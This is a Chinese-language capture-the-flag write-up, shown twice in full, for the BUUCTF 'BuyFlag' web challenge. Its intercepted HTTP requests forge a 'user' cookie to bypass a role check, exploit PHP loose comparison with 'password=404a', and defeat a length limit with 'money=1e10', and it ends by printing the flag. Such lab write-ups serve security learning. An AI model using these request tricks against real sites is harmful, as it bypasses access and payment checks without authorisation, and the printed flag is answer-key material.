BUUCTF WEB [极客大挑战 2019]BuyFlag

BUUCTF WEB [极客大挑战 2019]BuyFlag

---

• 进入环境后在MENU中发现PAYFLAG功能，点击进入，提示

  FLAG
  FLAG NEED YOUR 100000000 MONEY
  
  ATTENTION
  If you want to buy the FLAG:
  You must be a student from CUIT!!!
  You must be answer the correct password!!!
  
  Only Cuit's students can buy the FLAG
  

  说明想要购买flag需要满足三个条件

  1. be a student from CUIT
  2. be answer the correct password
  3. 100000000 MONEY

• 使用burp抓包

  GET /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=0
  Connection: close
  
  

  猜测Cookie中的user表示用户身份，条件1要求身份为student from CUIT，尝试将0改为1

  GET /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=1
  Connection: close
  
  
  

  提示

  you are Cuiter
  Please input your password!!
  

• F12查看网页源代码，发现一段注释

  <!--
  	~~~post money and password~~~
  if (isset($_POST['password'])) {
  	$password = $_POST['password'];
  	if (is_numeric($password)) {
  		echo "password can't be number</br>";
  	}elseif ($password == 404) {
  		echo "Password Right!</br>";
  	}
  }
  -->
  

  要求我们使用POST方法传送password和money变量，使用burp发送数据包

  POST /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Length: 29
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=1
  Connection: close
  
  password=404a&money=100000000
  

  提示

  you are Cuiter
  Password Right!
  Nember lenth is too long
  

• money的长度受到限制，尝试科学表达式

  POST /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Length: 24
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Type: application/x-www-form-urlencoded
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=1
  Connection: close
  
  password=404a&money=1e10
  

  得到flag

  you are Cuiter
  Password Right!
  flag{ccffe99d-8849-4c0c-960f-d468bf5877bc}
  

  BUUCTF WEB [极客大挑战 2019]BuyFlag

---

• 进入环境后在MENU中发现PAYFLAG功能，点击进入，提示

  FLAG
  FLAG NEED YOUR 100000000 MONEY
  
  ATTENTION
  If you want to buy the FLAG:
  You must be a student from CUIT!!!
  You must be answer the correct password!!!
  
  Only Cuit's students can buy the FLAG
  

  说明想要购买flag需要满足三个条件

  1. be a student from CUIT
  2. be answer the correct password
  3. 100000000 MONEY

• 使用burp抓包

  GET /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=0
  Connection: close
  
  

  猜测Cookie中的user表示用户身份，条件1要求身份为student from CUIT，尝试将0改为1

  GET /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=1
  Connection: close
  
  
  

  提示

  you are Cuiter
  Please input your password!!
  

• F12查看网页源代码，发现一段注释

  <!--
  	~~~post money and password~~~
  if (isset($_POST['password'])) {
  	$password = $_POST['password'];
  	if (is_numeric($password)) {
  		echo "password can't be number</br>";
  	}elseif ($password == 404) {
  		echo "Password Right!</br>";
  	}
  }
  -->
  

  要求我们使用POST方法传送password和money变量，使用burp发送数据包

  POST /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Length: 29
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=1
  Connection: close
  
  password=404a&money=100000000
  

  提示

  you are Cuiter
  Password Right!
  Nember lenth is too long
  

• money的长度受到限制，尝试科学表达式

  POST /pay.php HTTP/1.1
  Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Length: 24
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
  Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81
  Content-Type: application/x-www-form-urlencoded
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Cookie: user=1
  Connection: close
  
  password=404a&money=1e10
  

  得到flag

  you are Cuiter
  Password Right!
  flag{ccffe99d-8849-4c0c-960f-d468bf5877bc}